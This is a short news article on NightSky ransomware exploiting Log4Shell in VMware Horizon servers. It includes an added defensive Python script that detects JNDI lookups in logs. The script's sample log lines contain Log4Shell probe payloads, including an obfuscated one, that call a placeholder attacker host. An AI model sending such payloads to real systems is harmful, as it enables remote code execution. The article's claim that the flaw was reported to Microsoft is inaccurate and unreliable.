NightSky Ransomware targets VMware Horizon servers through Log4j vulnerability


NightSky Ransomware, first discovered in December last year, is reportedly targeting VMware Horizon servers through the Apache Log4j vulnerability known as Log4Shell. Information has also emerged that a Chinese hacking group dubbed DEV-0401, linked to the Hafnium group, is behind the development and distribution of the NightSky malware.

Microsoft has taken note of the situation and issued a warning on Monday this week that all network admins should take note of the new campaign and fix the Log4Shell vulnerability on their VMware Horizon servers as quickly as possible.

The Satya Nadella-led company concluded that the same hacking group, i.e. DEV-0401, was also involved in spreading other ransomware variants such as AtomSilo, Rook and LockFile.

Interestingly, NightSky is using phishing tactics, impersonating renowned company domains such as Sophos, Trend Micro, NVIDIA and Rogers, to spread its malicious tentacles, and in the UK it is targeting private entities by mimicking an email sent by the UK’s NHS.

Note 1- VMware Horizon servers deliver app and desktop virtualization in the cloud, allowing users to access those apps and desktops through a dedicated client or a web browser.

Note 2- On December 9th, 2021 a zero-day vulnerability was reported to Microsoft by the Alibaba Cloud Security team that involved arbitrary code execution in the Apache Log4j library, and it came to be known as the Log4Shell vulnerability.
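Defenders checking whether a Horizon server (or any other Log4j-backed service) has already been probed usually start with its request logs. The following added example, which is not code from the article, Microsoft or VMware, resolves the nested Log4j lookups attackers use to hide the string "jndi" and flags log lines that carry a JNDI lookup; the log lines are constructed and attacker.example is a placeholder.

```python
import re

# Constructed sample access-log lines (not real traffic): one benign request,
# one plain probe, one probe obfuscated with nested Log4j lookups.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Jan/2022:12:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2022:12:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Jan/2022:12:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}dap://attacker.example/b}"',
]

# Inner lookups that Log4j 2 resolves before the outer ${jndi:...} lookup runs;
# attackers nest them so the literal string "jndi" never appears in the raw line.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${name:-value} -> value
_JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)

def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups innermost-first, approximating what Log4j would do."""
    for _ in range(max_rounds):
        resolved = _LOWER.sub(lambda m: m.group(1).lower(), text)
        resolved = _UPPER.sub(lambda m: m.group(1).upper(), resolved)
        resolved = _DEFAULT.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text

def find_jndi_lookup(line: str):
    """Return the normalized ${jndi:...} expression found in a log line, or None."""
    match = _JNDI.search(normalize(line))
    return match.group(0) if match else None

def scan(lines):
    """Return (line_number, normalized lookup) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        lookup = find_jndi_lookup(line)
        if lookup:
            hits.append((number, lookup))
    return hits

if __name__ == "__main__":
    for number, lookup in scan(SAMPLE_LOGS):
        print(f"line {number}: Log4Shell-style lookup {lookup}")
```

A hit only shows that a lookup string reached the server; whether Log4j actually resolved it depends on the Log4j version and configuration, so matches are triage leads, not confirmed compromises.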

Naveen Goud is a writer at Cybersecurity Insiders covering topics such as Mergers & Acquisitions, Startups, Cyber Attacks, Cloud Security and Mobile Security